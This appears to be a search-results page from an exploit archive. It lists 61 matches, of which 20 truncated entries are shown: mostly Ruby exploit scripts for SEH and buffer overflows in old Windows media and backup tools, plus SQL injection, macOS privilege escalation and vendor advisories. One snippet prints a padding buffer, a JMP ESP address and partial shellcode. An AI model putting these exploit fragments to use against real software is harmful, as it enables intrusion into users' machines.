61 matches found
SyncBack Freeware V3.2.20.0 SEH Exploit
Exploit for windows platform in category local exploits ======================================= SyncBack Freeware V3.2.20.0 SEH Exploit ======================================= !/usr/bin/ruby Software : SyncBack Freeware V3.2.20.0 Author : Lincoln Date : May 19, 2010 Reference :...
phpscripte24 Shop System SQL Injection
----------------------------Information------------------------------------------------ +Name : phpscripte24 Shop System SQL Injection Vulnerability Exploit +Autor : Easy Laster +ICQ : 11-051-551 +Date : 09.05.2010 +Script : phpscripte24 Shop System +Download : ----------- +Demo :...
Urgent Backup 3.20 / ABC Backup Pro 5.20 / ABC Backup 5.50 (.zip) SEH
Exploit for windows platform in category local exploits ===================================================================== Urgent Backup 3.20 / ABC Backup Pro 5.20 / ABC Backup 5.50 .zip SEH ===================================================================== !/usr/bin/ruby Software : Urgent...
Archive Searcher 2.1 SEH Overwrite
!/usr/bin/ruby Software : Archive Searcher 2.1 Author : Lincoln OS : Windows Tested on : XP SP3 En VirtualBox Type of vuln : SEH Greetz to : Corelan Security Team http://www.corelan.be:8800/index.php/security/corelan-team-members/ Script provided 'as is', without any warranty. Use for educational...
Free WMA MP3 Converter Buffer Overflow
sorry was missing some text from my previous email Exploit Title: Free WMA MP3 Converter Date: 02/04/2010 Author: Richard leahy Software Link: http://www.freewarefiles.com/downloadscounter.php?programid=44210 Version: 1.1 Tested on: Windows Xp Sp2 category local exploit to trigger vulnrability op...
Easy RM to MP3 2.7.3.700 - Local Overflow
!/usr/bin/ruby breakit = "\x41" 26109 jump = "\x3a\xf2\xaa\x01" padit = "\x90" 25 01AAF23A FFE4 JMP ESP MSRMCcodec02.dll finishhim = "\xdd\xc5\xd9\x74\x24\xf4\x58\xbf\x27\x98\xb6\xfc\x31\xc9" + "\xb1\x32\x31\x78\x17\x83\xe8\xfc\x03\x5f\x8b\x54\x09\x63" +...
MediaCoder 0.6.2.4275 Universal Buffer Overflow Exploit (SEH)
Exploit for unknown platform in category local exploits ============================================================= MediaCoder 0.6.2.4275 Universal Buffer Overflow Exploit SEH ============================================================= !/usr/bin/env ruby MediaCoder 0.6.2.4275 Universal Buffer...
LoveCMS 1.6.2 Final Update Settings Remote Exploit
No description provided by source. !/usr/bin/ruby Exploit by PoMdaPiMp! --------------------- pomdapimpatgmaildotcom LoveCMS Exploit Series Episode 3: changing site settings ... Description: Simply change the site settings ! Usage: ./LoveCMS3settings.rb host Ex: ./LoveCMS2themes.rb...
Ruby WEBrick远程目录遍历漏洞
CVECAN ID: CVE-2008-1891 Ruby是一种功能强大的面向对象的脚本语言。 WEBrick是Ruby中内嵌的HTTP服务器程序库。WEBrick组件存在目录遍历漏洞,如果服务器使用的是NTFS或FAT文件系统的话,远程攻击者就可以通过在向使用WEBrick::HTTPServlet::FileHandler或WEBrick::HTTPServer.new的应用所提交的URI请求结尾附加“+”、“%2b”、“.”、“%2e”或“%20”字符执行目录遍历攻击,导致读取任意CGI文件。 Yukihiro Matsumoto Ruby 1.9.x Yukihiro...
Minnu's filer2 vulnerable in allowing arbitrary Ruby script execution
Overview The Minnu's filer2 is a Unix file managing program. This software has a vulnerability that allows a attacker to execute arbitrary Ruby scripts with the privilege of the user running the Minnu's filer2. Impact An attacker could take over a user's account, steal the user's information or...
scssboard-multi.txt
!/usr/bin/ruby inphex - i didnt include all of those bugs into the code,this code basicly checks if the forum is vulnerable and also exploits SQL Injection bug! all versions on sourceforge seem to be the same ;\ so check is beeing done on each version. - scb is set as default table prefix this...
DVD X Player 4.1 Professional .PLF file Buffer Overflow Exploit
Exploit for unknown platform in category local exploits =============================================================== DVD X Player 4.1 Professional .PLF file Buffer Overflow Exploit =============================================================== !/usr/bin/env ruby 0day DVD X Player 4.1...
Rumpus 5.1 Local Privilege Escalation / Remote FTP LIST PoC Exploit
No description provided by source. !/usr/bin/ruby Copyright c Lance M. Havok lmh at info-pull.com Kevin Finisterre kflists at digitalmunition.com Proof of concept for issues described in MOAB-18-01-2007. require 'net/ftp' require 'socket' bugselected = ARGV0 || 0.toi targethost = ARGV1 ||...
Rumpus 5.1 Local Privilege Escalation / Remote FTP LIST PoC Exploit
Exploit for macOS platform in category local exploits =================================================================== Rumpus 5.1 Local Privilege Escalation / Remote FTP LIST PoC Exploit =================================================================== !/usr/bin/ruby Copyright c Lance M. Hav...
Application Enhancer (APE) 2.0.2 Local Privilege Escalation Exploit
No description provided by source. !/usr/bin/ruby Exploit Of The Apes: A practical pwnage for Application UNEnhancer aka APU c 2006 LMH lmh at info-pull.com and Johnny Pwnerseed. This goes dedicated to macdev. For the childish flaming and great brain lag. Lesson: Don't talk about stuff you have N...
Mac OS X 10.4.8 DiskManagement BOM Local Privilege Escalation Exploit
No description provided by source. !/usr/bin/ruby c 2006 LMH lmh at info-pull.com Kevin Finisterre kflists at digitalmunition.com Thanks to The French Connection for bringing this in-the-wild 0-day to our attention. If /tmp/ps2 exists on your system, you've been pwned already...
JVN#31185550 tDiary arbitrary Ruby script execution vulnerability
Impact Depending on tDiary's configuration, an arbitrary Ruby script could be executed on the web server with tDiary's execution privilege. This could lead to information leak or erasure, password compromise, and contents alteration, etc. Solution Products Affected tDiary 2.0.3 tDiary...
3Com TFTP Service (3CTftpSvc) 2.0.1 - 'Long Transporting Mode' Remote Overflow
3comtftpdxpsp2.rb Copyright C cthulhu This is a poc intended to exploit the 3Com TFTP Service version 2.0.1 long transporting mode buffer overflow under xp sp2 english Vulnerability discovered by Liu Qixu Usage : ruby 3comftpdxpsp2.rb Default port is 69 if not specified require 'socket' win32bind...
Apple QuickTime 7.1.3 PlugIn - Arbitrary Script Execution
source: https://www.securityfocus.com/bid/20138/info Apple QuickTime plug-in is prone to an arbitrary-script-execution weakness when executing QuickTime Media Link files .qtl. An attacker can exploit this issue to execute arbitrary script code in the context of the affected application and load...
JVN#27365476 Minnu's filer2 vulnerable in allowing arbitrary Ruby script execution
Impact An attacker could take over a user's account, steal the user's information or delete it, or exploit the resources available to the user. In particular, if the Minnu's filer2 is run with the administrative privilege, an attacker could take over the entire system. Solution Products Affected...